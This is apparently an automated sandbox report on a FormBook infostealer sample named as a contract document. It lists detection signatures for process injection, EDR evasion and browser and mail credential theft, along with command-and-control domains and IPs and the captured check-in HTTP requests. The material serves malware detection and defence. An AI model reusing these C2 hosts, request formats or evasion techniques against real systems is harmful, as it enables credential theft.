Windows Analysis Report
New Order - RCII900718_Contract Drafting.exe

Overview

General Information

Sample name: New Order - RCII900718_Contract Drafting.exe
Analysis ID: 1559084
MD5: ab7ce84e9de63dbe7082872755e8a87c
SHA1: cfe36e1ca460e9033dfcda4bbd2a1373feeb22b9
SHA256: bfb840367f7275924d9f1516fc214fbdd64118a5420bdd17a85d2e57ed9cd5b7
Tags: exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: New Order - RCII900718_Contract Drafting.exe Avira: detected
Source: New Order - RCII900718_Contract Drafting.exe ReversingLabs: Detection: 31%
Source: New Order - RCII900718_Contract Drafting.exe Virustotal: Detection: 33% Perma Link
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: New Order - RCII900718_Contract Drafting.exe Joe Sandbox ML: detected
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RIDE.pdb source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167494215.000000000054E000.00000002.00000001.01000000.00000007.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2977812837.000000000054E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sc.pdbUGP source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sc.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F2CA10 FindFirstFileW,FindNextFileW,FindClose, 6_2_02F2CA10
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then xor eax, eax 6_2_02F19F90
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 6_2_02F1E5AA
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then mov ebx, 00000004h 6_2_037204EE

Networking

barindex
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49928 -> 108.181.189.7:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49963 -> 108.181.189.7:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49963 -> 108.181.189.7:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50014 -> 23.225.159.42:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 23.225.159.42:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49944 -> 108.181.189.7:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49999 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 23.225.159.42:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 23.225.159.42:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49811 -> 108.179.253.197:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49910 -> 108.181.189.7:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49811 -> 108.179.253.197:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 23.225.159.42:80
Source: DNS query: www.avalanchefi.xyz
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: CNSERVERSUS CNSERVERSUS
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: ASN852CA ASN852CA
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic HTTP traffic detected: GET /xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jalan2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic HTTP traffic detected: GET /ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.avalanchefi.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic HTTP traffic detected: GET /dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.laohub10.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic DNS traffic detected: DNS query: www.bloodbalancecaps.shop
Source: global traffic DNS traffic detected: DNS query: www.jalan2.online
Source: global traffic DNS traffic detected: DNS query: www.avalanchefi.xyz
Source: global traffic DNS traffic detected: DNS query: www.02760.wang
Source: global traffic DNS traffic detected: DNS query: www.laohub10.net
Source: unknown HTTP traffic detected: POST /xu9o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.jalan2.onlineOrigin: http://www.jalan2.onlineReferer: http://www.jalan2.online/xu9o/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 56 62 6c 64 64 6c 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 56 4c 52 52 4b 56 41 71 30 48 58 4e 74 34 4a 72 70 75 39 61 73 63 74 75 50 4e 48 68 7a 77 2f 67 55 67 3d 3d Data Ascii: Vblddl=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkVLRRKVAq0HXNt4Jrpu9asctuPNHhzw/gUg==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 06:16:25 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 06:16:28 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Wed, 20 Nov 2024 06:16:33 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75
Source: sc.exe, 00000006.00000002.2979542481.00000000043A4000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002964000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.000000002A2B4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5
Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.laohub10.net
Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.laohub10.net/dfeq/
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sc.exe, 00000006.00000002.2979542481.00000000049EC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.li
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sc.exe, 00000006.00000002.2977665984.0000000003280000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2/z
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: sc.exe, 00000006.00000002.2977665984.0000000003280000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033a
Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sc.exe, 00000006.00000002.2977665984.0000000003280000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sc.exe, 00000006.00000003.2420290466.0000000008175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
